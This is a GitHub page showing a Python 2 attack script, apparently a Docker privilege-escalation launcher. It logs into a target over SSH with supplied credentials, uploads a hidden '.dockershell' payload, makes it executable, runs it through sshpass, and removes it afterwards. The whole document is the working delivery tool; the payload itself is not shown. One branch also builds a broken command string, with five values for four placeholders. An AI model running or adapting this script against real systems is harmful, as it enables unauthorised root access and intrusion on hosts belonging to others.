Exploit-Dev-CVE-Code/docker_privesc_RCE.py at master · OlivierLaflamme/Exploit-Dev-CVE-Code · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
import atexit
import getpass
import paramiko
import signal
import sys
import os

# chdir to script working directory
os.chdir(os.path.realpath(os.path.dirname(sys.argv[0])))

# Bolean on when to cleanup.
CLEANUP = False

# Handler to exist cleanly on ctrl+C
def signal_handler(signal, frame):
    print "\nYou pressed Ctrl+C!"
    cleanup()
    sys.exit()
signal.signal(signal.SIGINT, signal_handler)


def exit_handler():
    global CLEANUP
    if CLEANUP is True:
        cleanup()


atexit.register(exit_handler)


def cleanup():
    ssh = ssh_connect()
    ssh.exec_command("rm -f ./.dockershell")
    ssh.close()


def ssh_connect():

    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(IP, username=USER, password=PASSWORD, port=PORT)
    except:
        print("Authentication failed.")
        sys.exit(0)

    return ssh


def ssh_upload_and_execute():

    global CLEANUP

    if os.path.isfile('/usr/bin/sshpass') is False:
        print("Missing sshpass application, please install it.")
        sys.exit(0)

    if os.path.isfile('./.dockershell') is False:
        print("Missing dockershell it is required for the exploit to work.")
        sys.exit(0)

    ssh = ssh_connect()

    try:
        sftp = ssh.open_sftp()
        sftp.put('./.dockershell', './.dockershell')
    except:
        pass

    CLEANUP = True

    ssh.exec_command("chmod a+x ./.dockershell")
    stdin, stdout, stderr = ssh.exec_command("pwd")
    path = str(stdout.readlines()[0]).strip()

    if '/home' in path:
        os.system('sshpass -p %s ssh -p %s %s@%s %s/.dockershell' % (PASSWORD, PORT, USER, IP, path))
    else:
        os.system('sshpass -p %s ssh -p %s %s@%s ~/.dockershell' % (PASSWORD, PORT, USER, IP, path))


def print_usage():
    print "Usage: %s <USERNAME>@<HOST:[PORT]>" % (sys.argv[0])
    sys.exit(0)

if __name__ == '__main__':

    if len(sys.argv) != 2:
        print_usage()

    HOST = sys.argv[1]

    if '@' not in HOST:
        print_usage()
    else:
        USER = HOST.split('@')[0]
        IP = HOST.split('@')[1]

    if ':' in IP:
        PORT = IP.split(':')[1]
        IP = IP.split(':')[0]
    else:
        PORT = 22

    PASSWORD = getpass.getpass('Password:')

    # Upload payload async
    ssh_upload_and_execute()